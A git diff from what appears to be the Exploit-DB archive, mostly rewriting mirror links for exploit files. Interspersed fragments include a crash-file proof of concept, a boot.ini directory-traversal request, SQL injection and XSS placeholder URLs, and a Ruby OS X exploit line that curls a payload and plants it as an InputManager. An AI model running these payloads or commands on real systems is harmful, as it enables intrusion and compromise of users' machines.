+# Statistics > Collectd
+# Statistics > Compared
+# Statistis >
+
+
+buffer = "A"*80000
+
+file = open("wireshark.txt","w")
+file.write(buffer)
+file.close()
+
+print "POC Created by -Acid"
+print " Email: acid.exploit@gmail.com"
+
+
+
diff --git a/platforms/multiple/dos/4601.txt b/platforms/multiple/dos/4601.txt
index 887aeb81c..eeebf5025 100755
--- a/platforms/multiple/dos/4601.txt
+++ b/platforms/multiple/dos/4601.txt
@@ -1,6 +1,6 @@
Ubuntu 6.06 DHCPd bug Remote Denial of Service Exploit
Author: RoMaNSoFt
-Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11022007-DoS-CVE-2007-5365.tgz
+Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4601.tgz (1022007-DoS-CVE-2007-5365.tgz)
# milw0rm.com [2007-11-02]
diff --git a/platforms/multiple/dos/5229.txt b/platforms/multiple/dos/5229.txt
index d493ee34e..15c47b8b7 100755
--- a/platforms/multiple/dos/5229.txt
+++ b/platforms/multiple/dos/5229.txt
@@ -112,7 +112,7 @@ to write to the log file (max 1023 bytes) in a buffer of only 500.
http://aluigi.org/poc/asgulo.zip
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-asgulo.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5229.zip (2008-asgulo.zip)
A]
http://SERVER:6161/snmx-cgi/fcheck.exe?-b+..\../..\boot.ini
diff --git a/platforms/multiple/dos/6029.txt b/platforms/multiple/dos/6029.txt
index 3efbb1b2b..0a1b0a8f5 100755
--- a/platforms/multiple/dos/6029.txt
+++ b/platforms/multiple/dos/6029.txt
@@ -12,6 +12,6 @@ Microsoft Visio on windows: unaffected
It is unknown at this time whether code execution is possible...
"""
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-www.NoiseBridge.net.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/6029.zip (2008-www.NoiseBridge.net.zip)
# milw0rm.com [2008-07-08]
diff --git a/platforms/multiple/dos/6174.txt b/platforms/multiple/dos/6174.txt
index 5896fb4e2..17d1d58d9 100755
--- a/platforms/multiple/dos/6174.txt
+++ b/platforms/multiple/dos/6174.txt
@@ -17,6 +17,6 @@ your scanner hanging, woops.
--
kokanin
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-snot.zip.bla
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/6174.zip (2008-snot.zip.bla)
# milw0rm.com [2008-07-31]
diff --git a/platforms/multiple/dos/6237.txt b/platforms/multiple/dos/6237.txt
index 7f9996b07..882192214 100755
--- a/platforms/multiple/dos/6237.txt
+++ b/platforms/multiple/dos/6237.txt
@@ -1,5 +1,5 @@
NULL pointer in Ventrilo 3.0.2
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-ventrilobotomy.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/6237.zip (2008-ventrilobotomy.zip)
# milw0rm.com [2008-08-13]
diff --git a/platforms/multiple/dos/6252.txt b/platforms/multiple/dos/6252.txt
index c65f4d3b6..5e0de4ebe 100755
--- a/platforms/multiple/dos/6252.txt
+++ b/platforms/multiple/dos/6252.txt
@@ -56,7 +56,7 @@ Credit : g_ (g_ # orange-bat # com)
http://www.orange-bat.com/adv/2008/vlc.dos.tta
-backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-vlc.dos.tta
+backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/6252.tta (2008-vlc.dos.tta)
- - PGP -
diff --git a/platforms/multiple/dos/6622.txt b/platforms/multiple/dos/6622.txt
index 79cf49d55..d11abd759 100755
--- a/platforms/multiple/dos/6622.txt
+++ b/platforms/multiple/dos/6622.txt
@@ -8,6 +8,6 @@ with a malformed Tamosoft CommView .ncf packet capture:
Err file wtap.c: line 620 (wtap_read): assertion failed:
(wth->phdr.pkt_encap != WTAP_ENCAP_PER_PACKET)
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-wireshark.ncf
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/6622.ncf (2008-wireshark.ncf)
# milw0rm.com [2008-09-29]
diff --git a/platforms/multiple/dos/8285.txt b/platforms/multiple/dos/8285.txt
index 708ba493a..95c52f6c0 100755
--- a/platforms/multiple/dos/8285.txt
+++ b/platforms/multiple/dos/8285.txt
@@ -2,6 +2,6 @@
// k`sOSe - works both in windows and linux
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-ffox-poc.tar.gz
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/8285.tar.gz (2009-ffox-poc.tar.gz)
# milw0rm.com [2009-03-25]
diff --git a/platforms/multiple/dos/8826.txt b/platforms/multiple/dos/8826.txt
index 3cc17d662..efab24e84 100755
--- a/platforms/multiple/dos/8826.txt
+++ b/platforms/multiple/dos/8826.txt
@@ -1,5 +1,5 @@
Acrobat <= 9.1.1 Stack Overflow Crashy PoC
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-crashy_the_clown.pdf
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/8826.pdf (2009-crashy_the_clown.pdf)
# milw0rm.com [2009-05-29]
diff --git a/platforms/multiple/local/10207.txt b/platforms/multiple/local/10207.txt
index 12abbf382..1c55117c4 100755
--- a/platforms/multiple/local/10207.txt
+++ b/platforms/multiple/local/10207.txt
@@ -121,4 +121,4 @@ VMWare ESX Server 4.0 ESX400-200909401
VMWare ESX Server 3.5 ESX350-200910401
VMWare ACE 2.5.3 Build 185404
-Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-11-22-vmware86.tar.gz
\ No newline at end of file
+Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10207.tar.gz (2009-11-22-vmware86.tar.gz)
\ No newline at end of file
diff --git a/platforms/multiple/local/10326.txt b/platforms/multiple/local/10326.txt
index ffd946871..6ee461b8c 100755
--- a/platforms/multiple/local/10326.txt
+++ b/platforms/multiple/local/10326.txt
@@ -114,4 +114,4 @@ Ghostscript Ghostscript 8.56
Ghostscript Ghostscript 8.54
Ghostscript Ghostscript 8.15
-Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-12-05-34340.ps
\ No newline at end of file
+Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10326.ps (2009-12-05-34340.ps)
\ No newline at end of file
diff --git a/platforms/multiple/local/10327.txt b/platforms/multiple/local/10327.txt
index c6a62b63b..91c3049bc 100755
--- a/platforms/multiple/local/10327.txt
+++ b/platforms/multiple/local/10327.txt
@@ -146,5 +146,5 @@ Avaya Intuity AUDIX LX 2.0
Avaya Intuity AUDIX LX 1.0
Avaya Intuity AUDIX
-Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-12-05-34337.pdf
+Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10327.pdf (2009-12-05-34337.pdf)
diff --git a/platforms/multiple/remote/13787.txt b/platforms/multiple/remote/13787.txt
index 4d65b6890..d72acf86c 100755
--- a/platforms/multiple/remote/13787.txt
+++ b/platforms/multiple/remote/13787.txt
@@ -9,6 +9,6 @@ NOTE: This was taken out of live malware and was not modified. BEWARE.
By visiting the following link, you agree that you are responsible for any damages that occur.
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/adobe-0day-2010-1297.tar.enc
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/13787.tar.enc (adobe-0day-2010-1297.tar.enc)
diff --git a/platforms/multiple/remote/1791.patch b/platforms/multiple/remote/1791.patch
index c7d555aa6..3cd922e9a 100755
--- a/platforms/multiple/remote/1791.patch
+++ b/platforms/multiple/remote/1791.patch
@@ -15,6 +15,6 @@ xx vnc-4_1_1-unixsrc.bl4ck/common/rfb/CConnection.cxx
os->flush();
vlog.debug("Choosing security type %s(%d)",secTypeName(secType),secType); }
-Compiled: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/05162006-BL4CK-vncviewer-authbypass.rar
+Compiled: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1791.rar (05162006-BL4CK-vncviewer-authbypass.rar)
diff --git a/platforms/multiple/remote/1799.txt b/platforms/multiple/remote/1799.txt
index fd8247ec9..638c9dc5a 100755
--- a/platforms/multiple/remote/1799.txt
+++ b/platforms/multiple/remote/1799.txt
@@ -1,8 +1,8 @@
class101 - http://heapoverflow.com
RealVNC 4.1.0 - 4.1.1 (VNC Null Authentication) Vulnerability Scanners
---------------------------------------------------------------------
-windows: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/05172006-VNC_bypauth-win32.rar
-linux: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/05172006-VNC_bypauth-linux.tar.gz
+windows: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1799-1.rar (05172006-VNC_bypauth-win32.rar)
+linux: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1799-2.rar (05172006-VNC_bypauth-linux.tar.gz)
comments: http://heapoverflow.com/viewtopic.php?p=1729
---------------------------------------------------------------------
diff --git a/platforms/multiple/remote/18619.txt b/platforms/multiple/remote/18619.txt
index 5d926b389..52ced8f7b 100755
--- a/platforms/multiple/remote/18619.txt
+++ b/platforms/multiple/remote/18619.txt
@@ -25,4 +25,4 @@ Enjoy :>
/Kingcope
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/tomcat-remote.zip
\ No newline at end of file
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/18619.zip (tomcat-remote.zip)
\ No newline at end of file
diff --git a/platforms/multiple/remote/349.txt b/platforms/multiple/remote/349.txt
index 66c07a76b..3a9d1cc18 100755
--- a/platforms/multiple/remote/349.txt
+++ b/platforms/multiple/remote/349.txt
@@ -1,3 +1,3 @@
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/x2.tgz
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/349.tgz (x2.tgz)
# milw0rm.com [2002-05-01]
diff --git a/platforms/multiple/remote/4877.txt b/platforms/multiple/remote/4877.txt
index 7f45db1d9..884639654 100755
--- a/platforms/multiple/remote/4877.txt
+++ b/platforms/multiple/remote/4877.txt
@@ -70,7 +70,7 @@ vulnerability are in the fantasy of the attacker...
http://aluigi.org/poc/sapone.zip
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-sapone.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4877.zip (2008-sapone.zip)
#######################################################################
diff --git a/platforms/multiple/remote/5622.txt b/platforms/multiple/remote/5622.txt
index 0746ca8bc..ca01f6fbe 100755
--- a/platforms/multiple/remote/5622.txt
+++ b/platforms/multiple/remote/5622.txt
@@ -12,7 +12,7 @@ On an unpatched system, which doesn't need to be debian, do the following:
keys provided by HD Moore - http://metasploit.com/users/hdm/tools/debian-openssl/
1. Download http://sugar.metasploit.com/debian_ssh_rsa_2048_x86.tar.bz2
- https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/debian_ssh_rsa_2048_x86.tar.bz2
+ https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5622.tar.bz2 (debian_ssh_rsa_2048_x86.tar.bz2)
2. Extract it to a directory
diff --git a/platforms/multiple/remote/5632.rb b/platforms/multiple/remote/5632.rb
index 66019cc86..cd287d727 100755
--- a/platforms/multiple/remote/5632.rb
+++ b/platforms/multiple/remote/5632.rb
@@ -13,8 +13,8 @@
#
# Common Keys:
#
-# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/debian_ssh_dsa_1024_x86.tar.bz2
-# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/debian_ssh_rsa_2048_x86.tar.bz2
+# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5632.tar.bz2 (debian_ssh_dsa_1024_x86.tar.bz2)
+# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5622.tar.bz2 (debian_ssh_rsa_2048_x86.tar.bz2)
#
#
# Usage:
diff --git a/platforms/multiple/remote/5790.txt b/platforms/multiple/remote/5790.txt
index b6c5fffa1..0970abeeb 100755
--- a/platforms/multiple/remote/5790.txt
+++ b/platforms/multiple/remote/5790.txt
@@ -9,6 +9,6 @@
# #
#############################################################################
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-snmpv3_exp.tgz
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5790.tgz (2008-snmpv3_exp.tgz)
# milw0rm.com [2008-06-12]
diff --git a/platforms/multiple/remote/6236.txt b/platforms/multiple/remote/6236.txt
index 2ac9b0f28..ea516bd34 100755
--- a/platforms/multiple/remote/6236.txt
+++ b/platforms/multiple/remote/6236.txt
@@ -36,6 +36,6 @@ So, if you have a GigE lan, any trojaned machine can poison your DNS during one
original source: http://tservice.net.ru/~s0mbre/blog/2008/08/08/
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-dns-bind.tgz
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/6236.tgz (2008-dns-bind.tgz)
# milw0rm.com [2008-08-13]
diff --git a/platforms/multiple/webapps/11184.txt b/platforms/multiple/webapps/11184.txt
index 7cc4ae418..89ae185ed 100755
--- a/platforms/multiple/webapps/11184.txt
+++ b/platforms/multiple/webapps/11184.txt
@@ -87,4 +87,4 @@ For more information, please visit www.cybsec.com
======================================================
Download:
======================================================
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/CYBSEC-Advisory2010-0102-FreePBX_2_5_x-2_6_Permanent_XSS.pdf
\ No newline at end of file
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11184.pdf (CYBSEC-Advisory2010-0102-FreePBX_2_5_x-2_6_Permanent_XSS.pdf)
\ No newline at end of file
diff --git a/platforms/multiple/webapps/11186.txt b/platforms/multiple/webapps/11186.txt
index 1ee5a25da..c760b2c20 100755
--- a/platforms/multiple/webapps/11186.txt
+++ b/platforms/multiple/webapps/11186.txt
@@ -94,4 +94,4 @@ For more information, please visit www.cybsec.com
===========================================================================
Download:
===========================================================================
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/CYBSEC-Advisory2010-0103-FreePBX_2_5_1_SQL_Injection.pdf
\ No newline at end of file
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11186.pdf (CYBSEC-Advisory2010-0103-FreePBX_2_5_1_SQL_Injection.pdf)
\ No newline at end of file
diff --git a/platforms/multiple/webapps/11187.txt b/platforms/multiple/webapps/11187.txt
index 03341f671..2fd14f904 100755
--- a/platforms/multiple/webapps/11187.txt
+++ b/platforms/multiple/webapps/11187.txt
@@ -85,4 +85,4 @@ For more information, please visit www.cybsec.com
===========================================================================
Download:
===========================================================================
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/CYBSEC-Advisory2010-0101-FreePBX_2_5_x_Information_disclosure.pdf
\ No newline at end of file
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11187.pdf (CYBSEC-Advisory2010-0101-FreePBX_2_5_x_Information_disclosure.pdf)
\ No newline at end of file
diff --git a/platforms/multiple/webapps/11211.txt b/platforms/multiple/webapps/11211.txt
index 2b6e6ca48..73eaf7cca 100755
--- a/platforms/multiple/webapps/11211.txt
+++ b/platforms/multiple/webapps/11211.txt
@@ -148,4 +148,4 @@ the world.
===========================================
The PDF version can be downloaded here:
===========================================
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/cpanel_http_response_splitting_vulnerability.pdf
\ No newline at end of file
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11211.pdf (cpanel_http_response_splitting_vulnerability.pdf)
\ No newline at end of file
diff --git a/platforms/multiple/webapps/14001.txt b/platforms/multiple/webapps/14001.txt
index 84b61e402..f317f8990 100755
--- a/platforms/multiple/webapps/14001.txt
+++ b/platforms/multiple/webapps/14001.txt
@@ -16,4 +16,4 @@ parameter “pkg_name”
Download:
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/cybsec_advisory_2010_0606_InterScan_Web_Security_5_0_Arbitrary_File_Download.pdf
\ No newline at end of file
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14001.pdf (cybsec_advisory_2010_0606_InterScan_Web_Security_5_0_Arbitrary_File_Download.pdf)
\ No newline at end of file
diff --git a/platforms/multiple/webapps/14004.txt b/platforms/multiple/webapps/14004.txt
index fccb42558..f092d9045 100755
--- a/platforms/multiple/webapps/14004.txt
+++ b/platforms/multiple/webapps/14004.txt
@@ -14,4 +14,4 @@ Reference to Vulnerability Disclosure Policy: http://www.cybsec.com/vulnerabilit
Vulnerability Description:
InterScan Web Security Virtual Appliance has a shell called “uihelper” that has suid bit on. So it could be possible to execute commands as root. Also using the vulnerability “Arbitrary File Upload” remote commands could be run as root.
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/cybsec_advisory_2010_0604_InterScan_Web_Security_5_0_Local_Privilege_Escalation.pdf
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14004.pdf (cybsec_advisory_2010_0604_InterScan_Web_Security_5_0_Local_Privilege_Escalation.pdf)
diff --git a/platforms/multiple/webapps/17393.txt b/platforms/multiple/webapps/17393.txt
index a20386c45..977d7b67a 100755
--- a/platforms/multiple/webapps/17393.txt
+++ b/platforms/multiple/webapps/17393.txt
@@ -69,4 +69,4 @@ Oracle Application Server 10g Release 3 (10.1.3.1.0) Overview of Oracle HTTP Ser
http://xss.cx/http-header-injection-expect-response-splitting-cI-113-example-poc.aspx
http://www.cvedetails.com/vulnerability-list/vendor_id-93/product_id-707/opxss-1/Oracle-Application-Server.html
-PDF Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/XSS_Header_Injection_in_OHS_by_Yasser.pdf
\ No newline at end of file
+PDF Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17393.pdf (XSS_Header_Injection_in_OHS_by_Yasser.pdf)
\ No newline at end of file
diff --git a/platforms/osx/dos/17567.txt b/platforms/osx/dos/17567.txt
index cf9645e8d..8206038e3 100755
--- a/platforms/osx/dos/17567.txt
+++ b/platforms/osx/dos/17567.txt
@@ -9,5 +9,5 @@
# Status : Patched
*/
-PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/CVE-2011-0222.zip
+PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17567.zip (CVE-2011-0222.zip)
diff --git a/platforms/osx/local/3181.rb b/platforms/osx/local/3181.rb
index 5a02ecde5..587042a48 100755
--- a/platforms/osx/local/3181.rb
+++ b/platforms/osx/local/3181.rb
@@ -12,7 +12,7 @@ bugselected = (ARGV[0] || 0).to_i
# INPUTMANAGER_URL = "http://projects.info-pull.com/moab/bug-files/MOAB-22-01-2007_im.tar.gz"
# keeping a local backup. /str0ke
-INPUTMANAGER_URL = "https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/MOAB-22-01-2007_im.tar.gz"
+INPUTMANAGER_URL = "https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/3181.tar.gz"
INPUTMANAGER_PLANT = "/usr/bin/curl -o /tmp/moab_im.tar.gz #{INPUTMANAGER_URL};" +
"mkdir -p ~/Library/InputManagers/;" +
"cd ~/Library/InputManagers/;" +
diff --git a/platforms/osx/local/3985.txt b/platforms/osx/local/3985.txt
index 0a55f6a9a..563cab926 100755
--- a/platforms/osx/local/3985.txt
+++ b/platforms/osx/local/3985.txt
@@ -1,5 +1,5 @@
Mac OS X <= 10.4.8 pppd Plugin Loading Privilege Escalation Exploit
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/05252007-osxpppd.tar
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/3985.tar (05252007-osxpppd.tar)
# milw0rm.com [2007-05-25]
diff --git a/platforms/osx/local/4013.txt b/platforms/osx/local/4013.txt
index 4ddf0dfe2..9bf9ef040 100755
--- a/platforms/osx/local/4013.txt
+++ b/platforms/osx/local/4013.txt
@@ -2,6 +2,6 @@
#
# CVE-ID: CVE-2007-0753 - http://docs.info.apple.com/article.html?artnum=305530
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/05302007-vpenis.tar.gz
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4013.tar.gz (05302007-vpenis.tar.gz)
# milw0rm.com [2007-05-30]
diff --git a/platforms/osx/remote/8753.txt b/platforms/osx/remote/8753.txt
index 9de80cc46..3905f1a9c 100755
--- a/platforms/osx/remote/8753.txt
+++ b/platforms/osx/remote/8753.txt
@@ -42,6 +42,6 @@ systems.
http://landonf.bikemonkey.org/static/moab-tests/CVE-2008-5353/hello.html
-compiled/decompiled: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-javax.tgz
+compiled/decompiled: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/8753.tgz (2009-javax.tgz)
# milw0rm.com [2009-05-20]
diff --git a/platforms/osx/shellcode/17564.asm b/platforms/osx/shellcode/17564.asm
index 836d12237..d5d4664eb 100755
--- a/platforms/osx/shellcode/17564.asm
+++ b/platforms/osx/shellcode/17564.asm
@@ -200,4 +200,4 @@ _main:
ret
; see http://t.co/nIrRbn5 for a detailed explanation
-; full package mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/osx.rop.24072011.tgz
\ No newline at end of file
+; full package mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17564.tgz (osx.rop.24072011.tgz)
\ No newline at end of file
diff --git a/platforms/php/dos/14678.zip b/platforms/php/dos/14678.zip
index 13fe4b8a4..5df5af671 100755
--- a/platforms/php/dos/14678.zip
+++ b/platforms/php/dos/14678.zip
@@ -49,4 +49,4 @@ FROM rdb$database", generator, inc);
===========================================================================
Download:
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/ibase_gen_id_poc.zip
\ No newline at end of file
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14678.zip (ibase_gen_id_poc.zip)
\ No newline at end of file
diff --git a/platforms/php/dos/18296.txt b/platforms/php/dos/18296.txt
index 344d66db8..d01790284 100755
--- a/platforms/php/dos/18296.txt
+++ b/platforms/php/dos/18296.txt
@@ -20,7 +20,7 @@ Original version by itz me (opensc.ws)
CVE-2011-4885
Mirrors List:
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/hashcollide.txt
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/18296.txt (hashcollide.txt)
http://compsoc.nuigalway.ie/~infodox/hashcollide.txt
http://jrs-s.net/hashcollide.txt
http://www.infodox.co.cc/Downloads/hashcollide.txt
diff --git a/platforms/php/webapps/12338.txt b/platforms/php/webapps/12338.txt
index a5bd831c4..85226f387 100755
--- a/platforms/php/webapps/12338.txt
+++ b/platforms/php/webapps/12338.txt
@@ -21,7 +21,7 @@ export_item_id=18 and 1=1&include_deps=on&output_format=3&export_type=graph_temp
===========================================================================
Download:
===========================================================================
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/Bonsai-SQL_Injection_in_Cacti.pdf
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/12338.pdf (Bonsai-SQL_Injection_in_Cacti.pdf)
diff --git a/platforms/php/webapps/12339.txt b/platforms/php/webapps/12339.txt
index 7a764e581..4218aaed0 100755
--- a/platforms/php/webapps/12339.txt
+++ b/platforms/php/webapps/12339.txt
@@ -19,7 +19,7 @@ Note that other properties of a Graph Template might also be affected.
===========================================================================
Download:
===========================================================================
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/Bonsai-OS_Command_Injection_in_Cacti.pdf
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/12339.pdf (Bonsai-OS_Command_Injection_in_Cacti.pdf)
diff --git a/platforms/php/webapps/12617.txt b/platforms/php/webapps/12617.txt
index 64d3fe962..9e9496408 100755
--- a/platforms/php/webapps/12617.txt
+++ b/platforms/php/webapps/12617.txt
@@ -27,5 +27,5 @@ Test Environment:
====================================================================
Download the following file for more instructions and exploits:
-Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/file_thingie_v255_Jeremiah.zip
+Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/12617.zip (file_thingie_v255_Jeremiah.zip)
====================================================================
\ No newline at end of file
diff --git a/platforms/php/webapps/13776.txt b/platforms/php/webapps/13776.txt
index 4767722c4..849e29b13 100755
--- a/platforms/php/webapps/13776.txt
+++ b/platforms/php/webapps/13776.txt
@@ -16,4 +16,4 @@ user who is able to add or modify Vendors, Customers, Employees or Inventary ite
Download:
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/cybsec_advisory_2010_0603_Phreebooks_v2_0_Multiple_Permanent_Cross_site_Scripting.pdf
\ No newline at end of file
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/13776.pdf (cybsec_advisory_2010_0603_Phreebooks_v2_0_Multiple_Permanent_Cross_site_Scripting.pdf)
\ No newline at end of file
diff --git a/platforms/php/webapps/13777.txt b/platforms/php/webapps/13777.txt
index 404c32d99..0d6426bed 100755
--- a/platforms/php/webapps/13777.txt
+++ b/platforms/php/webapps/13777.txt
@@ -17,4 +17,4 @@ The files are included into the scripts and its contents executed by the server.
Download:
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/cybsec_advisory_2010_0602_Phreebooks_v2_0_Local_File_Inclusion.pdf
\ No newline at end of file
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/13777.pdf (cybsec_advisory_2010_0602_Phreebooks_v2_0_Local_File_Inclusion.pdf)
\ No newline at end of file
diff --git a/platforms/php/webapps/13778.txt b/platforms/php/webapps/13778.txt
index 33acd30d8..bf9a01b14 100755
--- a/platforms/php/webapps/13778.txt
+++ b/platforms/php/webapps/13778.txt
@@ -16,4 +16,4 @@ move up to root directory, thus permitting navigation through the file system.
Download:
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/cybsec_advisory_2010_0601_Phreebooks_v2_0_Directory_Traversal.pdf
\ No newline at end of file
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/13778.pdf (cybsec_advisory_2010_0601_Phreebooks_v2_0_Directory_Traversal.pdf)
\ No newline at end of file
diff --git a/platforms/php/webapps/17309.txt b/platforms/php/webapps/17309.txt
index dd762a614..fdd66522c 100755
--- a/platforms/php/webapps/17309.txt
+++ b/platforms/php/webapps/17309.txt
@@ -29,7 +29,7 @@ the MP3 file format provided with the standard PHPCaptcha package
available from www.phpcaptcha.org is available at:
http://www.senseofsecurity.com.au/advisories/SOS-11-007.zip
-Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/SOS-11-007.zip
+Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17309.zip (SOS-11-007.zip)
Proof of concept code is only available for the MP3 version of the
audio, however the WAV audio format is also affected by the same
diff --git a/platforms/php/webapps/37008.txt b/platforms/php/webapps/37008.txt
new file mode 100755
index 000000000..c3ab0e45f
--- /dev/null
+++ b/platforms/php/webapps/37008.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/52701/info
+
+Event Calendar PHP is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+http://www.example.com/demo_eventcalendar.php?cal_id=1&cal_month=2&cal_year=[XSS]
\ No newline at end of file
diff --git a/platforms/php/webapps/37010.txt b/platforms/php/webapps/37010.txt
new file mode 100755
index 000000000..5fef243f6
--- /dev/null
+++ b/platforms/php/webapps/37010.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/52720/info
+
+FbiLike is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+FbiLike 1.00 is vulnerable; other versions may also be affected.
+
+http://www.example.com/fbilike/like.php?id=[XSS]
\ No newline at end of file
diff --git a/platforms/php/webapps/37011.txt b/platforms/php/webapps/37011.txt
new file mode 100755
index 000000000..48824cb62
--- /dev/null
+++ b/platforms/php/webapps/37011.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/52725/info
+
+Geeklog is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Geeklog 1.8.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/easyfile/index.php?folder=(SQLI)
\ No newline at end of file
diff --git a/platforms/php/webapps/37012.txt b/platforms/php/webapps/37012.txt
new file mode 100755
index 000000000..328dab3a3
--- /dev/null
+++ b/platforms/php/webapps/37012.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/52728/info
+
